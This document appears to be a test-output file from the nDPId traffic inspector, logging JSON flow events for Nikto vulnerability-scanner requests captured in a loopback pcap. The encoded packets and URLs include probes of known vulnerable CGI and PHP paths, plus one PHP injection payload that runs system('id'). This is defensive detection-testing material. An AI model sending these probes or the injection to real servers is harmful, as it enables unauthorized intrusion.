+01052{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7560000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"flow_avg_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1576420277500,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277500,"pkt":"AAAAAAAAAAAAAAAACABFAADKj49AAEAGrJx\/AAABfwAAAcWeH5BxerdT3YbEDoAYAED+vgAAAQEICp1m\/iSdZv4kR0VUIC90aWtpL3Rpa2ktaW5zdGFsbC5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAyMikNCg0K"} +01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7560000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"flow_avg_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1576420277501,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277501,"pkt":"AAAAAAAAAAAAAAAACABFAADQ2RZAAEAGYw9\/AAABfwAAAcWgH5BlMeHM00k6b4AYAED+xAAAAQEICp1m\/iWdZv4lR0VUIC9zY3JpcHRzL3NhbXBsZXMvZGV0YWlscy5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwMjMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7560000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1576420277503,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1576420277503,"pkt":"AAAAAAAAAAAAAAAACABFAADzlctAAEAGpjd\/AAABfwAAAcWiH5BEoK0q6pkm3YAYAED+5wAAAQEICp1m\/iedZv4nR0VUIC9mb3J1bWRpc3BsYXkucGhwP0dMT0JBTFNcW1xdPTEmZj0yJmNvbW1hPVwiLnN5c3RlbVwoJ2lkJ1wpXC5cIiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDA3MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01117{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7560000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"flow_avg_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1576420277505,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576420277505,"pkt":"AAAAAAAAAAAAAAAACABFAADNh+tAAEAGtD1\/AAABfwAAAcWkH5AZpL8K5\/crh4AYAED+wQAAAQEICp1m\/imdZv4oR0VUIC9ndWVzdGJvb2svZ3Vlc3Rib29rLmh0bWwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwNzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01071{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7560000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1576420277506,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420277506,"pkt":"AAAAAAAAAAAAAAAACABFAADSOPFAAEAGAzN\/AAABfwAAAcWmH5AZrAAQDbKHy4AYAED+xgAAAQEICp1m\/iqdZv4qR0VUIC9odG1sL2NnaS1iaW4vY2dpY3NvP3F1ZXJ5PUFBQSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDcyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01077{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7560000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"flow_avg_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1576420277509,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277509,"pkt":"AAAAAAAAAAAAAAAACABFAADGjRRAAEAGrxt\/AAABfwAAAcWoH5A27bX0CottMYAYAED+ugAAAQEICp1m\/i2dZv4sR0VUIC9iYi1kbmJkL2ZheHN1cnZleSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE0MikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1576420277510,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277510,"pkt":"AAAAAAAAAAAAAAAACABFAADBP59AAEAG\/JV\/AAABfwAAAcWqH5D7oQd9r6h8pYAYAED+tQAAAQEICp1m\/i6dZv4uR0VUIC9jYXJ0Y2FydC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_packet_id":1,"flow_last_seen":1576420277512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277512,"pkt":"AAAAAAAAAAAAAAAACABFAADQQ2ZAAEAG+L9\/AAABfwAAAcWsH5AIFXuH0ihJCIAYAED+xAAAAQEICp1m\/i+dZv4vR0VUIC9zY3JpcHRzL0NhcmVsbG8vQ2FyZWxsby5kbGwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01075{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":521,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277512,"flow_last_seen":1576420277512,"flow_idle_time":7560000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277512,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50604,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/Carello\/Carello.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000144)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_packet_id":1,"flow_last_seen":1576420277513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277513,"pkt":"AAAAAAAAAAAAAAAACABFAAC9L\/9AAEAGDDp\/AAABfwAAAcWuH5CdEhcgbNGBkoAYAED+sQAAAQEICp1m\/jGdZv4xR0VUIC93LWFnb3JhLyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE4MykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":522,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277513,"flow_last_seen":1576420277513,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277513,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50606,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/w-agora\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000183)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00702{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_packet_id":1,"flow_last_seen":1576420277515,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":234,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":234,"pkt_l4_len":200,"thread_ts_msec":1576420277515,"pkt":"AAAAAAAAAAAAAAAACABFAADcMJVAAEAGC4V\/AAABfwAAAcWwH5AAUQhya1uvboAYAED+0AAAAQEICp1m\/jOdZv4zR0VUIC9jZ2ktbG9jYWwvY2dpZW1haWwtMS42L2NnaWNzbz9xdWVyeT1BQUEgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAzNDQpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":523,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":523,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277515,"flow_last_seen":1576420277515,"flow_idle_time":7560000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":1,"thread_ts_msec":1576420277515,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50608,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cgi-local\/cgiemail-1.6\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000344)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":524,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":524,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277516,"flow_last_seen":1576420277516,"flow_idle_time":7560000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1576420277516,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50610,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 